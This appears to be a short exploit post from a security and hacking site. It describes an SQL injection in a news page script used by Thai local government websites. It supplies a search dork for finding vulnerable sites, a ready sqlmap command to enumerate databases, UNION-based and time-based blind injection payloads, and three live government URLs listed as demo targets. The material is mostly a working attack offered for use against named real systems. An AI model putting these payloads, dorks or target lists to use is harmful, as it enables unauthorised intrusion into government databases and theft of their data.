Information Exploit
[+] Exploit Title: Thailand Government Sql İnjection Vulnerability
[+] Author : Cxsecurity.com and SaruH4N & Turkhackteam.org
[+] Dork : inurl:select_news.php?news_id=
[+] Tested on : Kali Linux 2018.1, Chrome
Poc
[+] SQLMAP Poc : sqlmap -u "http://www.muangphai.go.th/select_news.php?news_id=148" --dbs
[+] Poc SQL Injection : Payload: news_id=91' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178767171,0x737058556a724a7847784a786d724f4d71617448515a44456444516d526177676349527446507356,0x716b7a7671),NULL,NULL,NULL-- lIGH
Get Parameter
Parameter: news_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: news_id=67' AND SLEEP(5) AND 'TwPA'='TwPA
Demo Target
- http://www.namtok.go.th/select_news.php?news_id=91
- http://www.bangtathen.go.th/select_news.php?news_id=67
- http://www.muangphai.go.th/select_news.php?news_id=148
Video Tutorial
Sumber : [Cxsecurity.com]
0 Comments